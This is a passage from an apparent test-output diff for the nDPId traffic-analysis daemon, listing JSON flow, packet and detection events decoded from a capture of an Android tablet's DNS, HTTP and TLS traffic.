layer","datalink":12,"packet_id":943,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652845412} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":943,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9oQABABgLmwKi0ArL40NKmXgBQrzComDk0PkCAEAf34kkAAAEBCAoANZmRGkFqEg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":944,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652846325} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":944,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND9pQABABgLlwKi0ArL40NKmXgBQrzComDk0Q6yAEAgk3AIAAAEBCAoANZntGkFqZA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":945,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652846377} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":945,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9qQABABgLYwKi0ArL40NKmXgBQrzComDk0Q6ywEAgkkQkAAAEBCAoANZnyGkFqZAEBBQo5NE6EOTRT8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652846380} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD9rQABABgLXwKi0ArL40NKmXgBQrzComDk0Q6ywEAgki50AAAEBCAoANZnyGkFqZAEBBQo5NE6EOTRZXA=="} -00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":946,"source":"ocs.pcap","alias":"nDPId-test","packets-captured":946,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1895,"global_ts_msec":1449652846380} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652784341,"flow_last_seen":1449652784341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652784341,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":47699,"dst_port":5228,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1449652784341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652784341,"pkt":"RQAAPKbzQABABiV4wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIdPYAAAIEBbQEAggKADWBtgAAAAABAwMG"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1449652786071,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":63,"pkt_l4_len":43,"thread_ts_msec":1449652786071,"pkt":"RQAAP4JiQABAETORwKi0AggICAiWSAA1ACtxaqbPAQAAAQAAAAAAAAVvY3UwMwhsYWJnZW5jeQJ3cwAAAQAB"} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocu03.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1449652786098,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":70,"pkt_l4_len":50,"thread_ts_msec":1449652786098,"pkt":"RQAARoJmQABAETOGwKi0AggICAicoQA1ADK8OQlbAQAAAQAAAAAAAAhzZXR0aW5ncwtjcmFzaGx5dGljcwNjb20AAAEAAQ=="} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"dns": {"query":"settings.crashlytics.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1449652786130,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":67,"pkt_l4_len":47,"thread_ts_msec":1449652786130,"pkt":"RQAAQ4JpQABAETOGwKi0AggICAgFCwA1AC+TFZykAQAAAQAAAAAAAANhcGkEZXUwMQhjYXBwdGFpbgNjb20AAAEAAQ=="} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"api.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786135,"flow_last_seen":1449652786135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786135,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1449652786135,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786135,"pkt":"RQAAPJwfQABABqbCwKi0ArL40Da8egBQwI4edgAAAACgAjkI+LAAAAIEBbQEAggKADWCaQAAAAABAwMG"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786152,"flow_last_seen":1449652786152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786152,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1449652786152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786152,"pkt":"RQAAPCFLQABABqbpwKi0AhcV5seZXwG7KAKjIAAAAACgAjkIs5MAAAIEBbQEAggKADWCawAAAAABAwMG"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786167,"flow_last_seen":1449652786167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786167,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1449652786167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786167,"pkt":"RQAAPOubQABABs8fwKi0AomHgc7QbABQfGRp9gAAAACgAjkIVT4AAAIEBbQEAggKADWCbQAAAAABAwMG"} +00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1449652786190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786190,"pkt":"RQAANJwgQABABqbJwKi0ArL40Da8egBQwI4ed\/tL3mKAEADlQqoAAAEBCAoANYJvRwX8Kg=="} +01476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1449652786215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":824,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":824,"pkt_l4_len":804,"thread_ts_msec":1449652786215,"pkt":"RQADOJwhQABABqPEwKi0ArL40Da8egBQwI4ed\/tL3mKAGADlWgkAAAEBCAoANYJxRwX8KlBPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIzNA0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjAuNDsgZnItZnI7IEdULVA3NTEwIEJ1aWxkL0lNTTc2RCkgQXBwbGVXZWJLaXQvNTM0LjMwIChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgU2FmYXJpLzUzNC4zMA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI\/Pgo8bGd5cmVxdWVzdCBtb2R1bGU9IkNNL1ZPRCI+Cgk8YWN0aW9uIG5hbWU9ImluaXQiPgoJCTxwYXJhbSBuYW1lPSJzY3JlZW5TaXplIiB2YWx1ZT0iIi8+CgkJPHBhcmFtIG5hbWU9InRpbWVzdGFtcCIgdmFsdWU9IjAiLz4KCQk8cGFyYW0gbmFtZT0iYXBwLXZlcnNpb24iIHZhbHVlPSIxLjQuNyIvPgoJPC9hY3Rpb24+CjwvbGd5cmVxdWVzdD4="} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786135,"flow_last_seen":1449652786215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1449652786215,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build\/IMM76D) AppleWebKit\/534.30 (KHTML, like Gecko) Version\/4.0 Safari\/534.30"}} +00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1449652786268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786268,"pkt":"RQAANOucQABABs8mwKi0AomHgc7QbABQfGRp97oFwGaAEADlOEAAAAEBCAoANYJ3vXlL7A=="} +00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1449652786271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":211,"pkt_l4_len":191,"thread_ts_msec":1449652786271,"pkt":"RQAA0+udQABABs6GwKi0AomHgc7QbABQfGRp97oFwGaAGADl3TMAAAEBCAoANYJ3vXlL7EdFVCAveG1wcC1kaXNjbz9kZXZpY2VpZD1mMmM5OTNkNjIxOGY1ZTIyZmUyODRiMmU5MGM4MmYzYiZwdXNoX29uX2RldmljZT10cnVlJmFwcGlkPW9jczAwMDAwMyBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786167,"flow_last_seen":1449652786271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1449652786271,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/xmpp-disco?deviceid=f2c993d6218f5e22fe284b2e90c82f3b&push_on_device=true&appid=ocs000003","code":0,"content_type":"","user_agent":""}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786395,"flow_last_seen":1449652786395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786395,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1449652786395,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786395,"pkt":"RQAAPGAaQABABlqhwKi0AomHgc6vnwBQfAzimQAAAACgAjkI\/akAAAIEBbQEAggKADWCgwAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1449652786500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786500,"pkt":"RQAANGAbQABABlqowKi0AomHgc6vnwBQfAzimh3f\/xqAEADlPeYAAAEBCAoANYKOvXlMIw=="} +00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1449652786501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":136,"pkt_l4_len":116,"thread_ts_msec":1449652786501,"pkt":"RQAAiGAcQABABlpTwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKR0AAAEBCAoANYKOvXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786395,"flow_last_seen":1449652786501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652786501,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/ip-to-country","code":0,"content_type":"","user_agent":""}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1449652786934,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":72,"pkt_l4_len":52,"thread_ts_msec":1449652786934,"pkt":"RQAASIK5QABAETMxwKi0AggICAi+ggA1ADS3+1EXAQAAAQAAAAAAAAdhbmRyb2lkB2NsaWVudHMGZ29vZ2xlA2NvbQAAAQAB"} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787003,"flow_last_seen":1449652787003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787003,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1449652787003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787003,"pkt":"RQAAPLBhQABABm1GwKi0Atg60C6hBwG7mRQyoQAAAACgAjkIAHcAAAIEBbQEAggKADWCwAAAAAABAwMG"} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1449652787075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787075,"pkt":"RQAANLBiQABABm1NwKi0Atg60C6hBwG7mRQyouLMvMiAEADlCc8AAAEBCAoANYLHGASl5Q=="} +00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1449652787100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652787100,"pkt":"RQAA7LBjQABABmyUwKi0Atg60C6hBwG7mRQyouLMvMiAGADlzvUAAAEBCAoANYLKGASl5RYDAQCzAQAArwMBVmhd8vjfjZbbQQM2P+6kSvFiVrQbP+1p3IwwDXzkWPQAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787003,"flow_last_seen":1449652787100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652787100,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 